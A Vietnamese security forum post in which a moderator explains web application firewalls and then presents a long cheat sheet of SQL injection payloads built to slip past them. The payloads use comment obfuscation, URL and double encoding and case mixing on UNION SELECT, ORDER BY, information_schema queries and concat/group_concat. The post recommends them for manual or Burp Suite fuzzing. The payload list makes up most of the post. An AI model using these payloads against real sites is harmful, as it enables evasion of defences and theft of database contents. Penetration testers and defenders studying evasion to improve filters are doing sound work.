Bypass WAF khai thác SQL injection

Thảo luận trong 'Web Security' bắt đầu bởi krone, 04/04/17, 05:04 PM.

  1. krone

    krone Moderator Thành viên BQT

    Tham gia: 26/07/16, 03:07 PM
    Bài viết: 175
    Đã được thích: 102
    Điểm thành tích:
    43
    Web Security: Tường lửa ứng dụng Web (WAF)

    Tường lửa ứng dụng web là một giải pháp nhằm bảo vệ cho ứng dụng web tránh khỏi các lỗi bảo mật. WAF là thiết bị phần cứng hoặc phần mềm được cài đặt lên máy chủ web có chức năng theo dõi các thông tin được truyền tải qua giao thức http/https giữa trình duyệt của người dùng và máy chủ web. Một WAF có khả năng thực thi các chính sách bảo mật dựa trên các dấu hiệu tấn công, các giao thức tiêu chuẩn và các lưu lượng truy cập ứng dụng web bất thường. Đây là điều mà các tường lửa mạng khác không làm được.

    [​IMG]


    Đối với SQL, dựa vào input đầu vào mà WAF thực hiện filter các chuỗi câu lệnh sql có ý nghĩa được đưa vào ứng dụng core xử lý.

    Tuy nhiên, WAF chưa hẳn là tất cả để có thể bảo vệ được ứng dụng web trước nguy cơ về lỗi bảo mật SQL Injection. Có khá nhiều cách bypass qua được WAF dựa vào một số input valid mà khi được đưa vào Ứng dụng web xử lý, nền tảng hệ điều hành gặp lỗi ở một vài điểm xử lý chuẩn cho các chuỗi hay do chính hệ quản trị cơ sở dữ liệu không xử lý chính xác chuỗi input. Một vài kiểu bypass như:

    • BufferOverflow WAF Bypass
    • CRLF WAF Bypass
    • Bypass with information_schema.statics
    • Bypass with information_schema.key_column_usage
    • ….


    Bypass WAF cho khai thác SQL injection

    Dưới đây mình xin dưới thiệu một vài cheat sheet để bypass WAF, được liệt kê theo thứ tự các lệnh query hợp lệ.

    [~] order by [~]
    /**/ORDER/**/BY/**/
    /*!order*/+/*!by*/
    /*!ORDER BY*/
    /*!50000ORDER BY*/
    /*!50000ORDER*//**//*!50000BY*/
    /*!12345ORDER*/+/*!BY*/

    [~] UNION select [~]
    /*!00000Union*/ /*!00000Select*/
    /*!50000%55nIoN*/ /*!50000%53eLeCt*/
    %55nion %53elect
    %55nion(%53elect 1,2,3)– –
    +union+distinct+select+
    +union+distinctROW+select+
    /**//*!12345UNION SELECT*//**/
    /**//*!50000UNION SELECT*//**/
    /**/UNION/**//*!50000SELECT*//**/
    /*!50000UniON SeLeCt*/
    union /*!50000%53elect*/
    + #?uNiOn + #?sEleCt
    + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
    /*!%55NiOn*/ /*!%53eLEct*/
    /*!u%6eion*/ /*!se%6cect*/
    +un/**/ion+se/**/lect
    uni%0bon+se%0blect
    %2f**%2funion%2f**%2fselect
    union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
    REVERSE(noinu)+REVERSE(tceles)
    /*–*/union/*–*/select/*–*/
    union (/*!/**/ SeleCT */ 1,2,3)
    /*!union*/+/*!select*/
    union+/*!select*/
    /**/union/**/select/**/
    /**/uNIon/**/sEleCt/**/
    +%2F**/+Union/*!select*/
    /**//*!union*//**//*!select*//**/
    /*!uNIOn*/ /*!SelECt*/
    +union+distinct+select+
    +union+distinctROW+select+
    uNiOn aLl sElEcT
    UNIunionON+SELselectECT
    /**/union/*!50000select*//**/
    0%a0union%a0select%09
    %0Aunion%0Aselect%0A
    %55nion/**/%53elect
    uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
    %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
    %0A%09UNION%0CSELECT%10NULL%
    /*!union*//*–*//*!all*//*–*//*!select*/
    union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
    /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
    +UnIoN/*&a=*/SeLeCT/*&a=*/
    union+sel%0bect
    +uni*on+sel*ect+
    +#1q%0Aunion all#qa%0A#%0Aselect
    union(select (1),(2),(3),(4),(5))
    UNION(SELECT(column)FROM(table))
    %23xyz%0AUnIOn%23xyz%0ASeLecT+
    %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
    union(select(1),2,3)
    union (select 1111,2222,3333)
    uNioN (/*!/**/ SeleCT */ 11)
    union (select 1111,2222,3333)
    +#1q%0AuNiOn all#qa%0A#%0AsEleCt
    /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
    %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
    +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
    +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
    /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
    +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
    /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
    /union\sselect/g
    /union\s+select/i
    /*!UnIoN*/SeLeCT
    +UnIoN/*&a=*/SeLeCT/*&a=*/
    +uni>on+sel>ect+
    +(UnIoN)+(SelECT)+
    +(UnI)(oN)+(SeL)(EcT)
    +’UnI”On’+’SeL”ECT’
    +uni on+sel ect+
    +/*!UnIoN*/+/*!SeLeCt*/+
    /*!u%6eion*/ /*!se%6cect*/
    uni%20union%20/*!select*/%20
    union%23aa%0Aselect
    /**/union/*!50000select*/
    /^.*union.*$/ /^.*select.*$/
    /*union*/union/*select*/select+
    /*uni X on*/union/*sel X ect*/
    +un/**/ion+sel/**/ect+
    +UnIOn%0d%0aSeleCt%0d%0a
    UNION/*&test=1*/SELECT/*&pwn=2*/
    un?+un/**/ion+se/**/lect+
    +UNunionION+SEselectLECT+
    +uni%0bon+se%0blect+
    %252f%252a*/union%252f%252a /select%252f%252a*/
    /%2A%2A/union/%2A%2A/select/%2A%2A/
    %2f**%2funion%2f**%2fselect%2f**%2f
    union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
    /*!UnIoN*/SeLecT+

    [~] information_schema.tables [~]
    /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– –
    /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()– –
    /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()– –
    /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()– –
    /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
    /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table


    [~] concat() [~]
    CoNcAt()
    concat()
    CON%08CAT()
    CoNcAt()
    %0AcOnCat()
    /**//*!12345cOnCat*/
    /*!50000cOnCat*/(/*!*/)
    unhex(hex(concat(table_name)))
    unhex(hex(/*!12345concat*/(table_name)))
    unhex(hex(/*!50000concat*/(table_name)))

    [~] group_concat() [~]
    /*!group_concat*/()
    gRoUp_cOnCAt()
    group_concat(/*!*/)
    group_concat(/*!12345table_name*/)
    group_concat(/*!50000table_name*/)
    /*!group_concat*/(/*!12345table_name*/)
    /*!group_concat*/(/*!50000table_name*/)
    /*!12345group_concat*/(/*!12345table_name*/)
    /*!50000group_concat*/(/*!50000table_name*/)
    /*!GrOuP_ConCaT*/()
    /*!12345GroUP_ConCat*/()
    /*!50000gRouP_cOnCaT*/()
    /*!50000Gr%6fuP_c%6fnCAT*/()
    unhex(hex(group_concat(table_name)))
    unhex(hex(/*!group_concat*/(/*!table_name*/)))
    unhex(hex(/*!12345group_concat*/(table_name)))
    unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
    unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
    unhex(hex(/*!50000group_concat*/(table_name)))
    unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
    unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
    convert(group_concat(table_name)+using+ascii)
    convert(group_concat(/*!table_name*/)+using+ascii)
    convert(group_concat(/*!12345table_name*/)+using+ascii)
    convert(group_concat(/*!50000table_name*/)+using+ascii)
    CONVERT(group_concat(table_name)+USING+latin1)
    CONVERT(group_concat(table_name)+USING+latin2)
    CONVERT(group_concat(table_name)+USING+latin3)
    CONVERT(group_concat(table_name)+USING+latin4)
    CONVERT(group_concat(table_name)+USING+latin5)

    Các bạn có thể đặt các cheatsheet này vào trong các cuộc tấn công fuzzing bằng tay hoặc với kỹ thuật tự động tùy thuộc vào từng trường hợp cụ thể.
    Công cụ BurpSuite dùng để pentest Web Application cũng hỗ trợ để làm điều này.

    P/s: Bài viết tới mình sẽ giới thiệu một số công cụ có thể sử dụng một vài kỹ thuật tương tự như việc sử dụng cheatsheet để bypass WAF nâng cao :). Cám ơn mọi người đã theo dõi bài đọc.
     
    sunny, Sugi_b3o, DDos and 1 other person like this.